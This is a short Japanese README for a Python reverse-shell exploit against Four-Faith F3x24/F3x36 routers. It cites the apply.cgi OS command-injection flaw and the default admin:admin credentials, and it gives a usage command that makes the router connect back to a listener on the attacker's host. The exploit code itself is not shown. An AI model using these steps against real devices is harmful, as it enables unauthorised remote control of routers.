
Four-Faithルーターのリバースシェルを取得するためのエクスプロイト
これは、Four-Faith ルーターのモデル F3x24 および F3x36 を対象としたリバースシェルを取得するためのエクスプロイトです。
「Four-Faith ルーターのモデル F3x24 および F3x36 は、オペレーティングシステム(OS)コマンドインジェクションの脆弱性の影響を受けます。少なくともファームウェアバージョン 2.0 では、認証されたリモート攻撃者が、apply.cgi を介してシステム時刻を変更する際に、HTTP 経由で任意の OS コマンドを実行できます。さらに、このファームウェアバージョンにはデフォルトの認証情報が存在し、これが変更されていない場合、この脆弱性は事実上、認証を必要としないリモートからの OS コマンド実行の問題に変わります。」
出典: nist.gov
このスクリプトは、VulnCheck によって観測されたペイロードに基づいています。
エクスプロイトを実行する前に、お使いのマシンで TCP サーバーを起動してください。
その後、以下を実行します。
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
ここで
RHOST はリモート IP アドレスです。ドメインを追加することもできます。LHOST は、お使いのマシン上の TCP サーバーの IP です。LPORT は、TCP サーバーのポートです。USERNAME と PASSWORD は、ルーターの認証情報です。デフォルトは admin:admin です。RPORT は、ルーターのリモートポートです。デフォルトは 80 です。このエクスプロイトは、テストおよび許可された環境でのみ使用してください。
悪意のある目的で使用しないでください。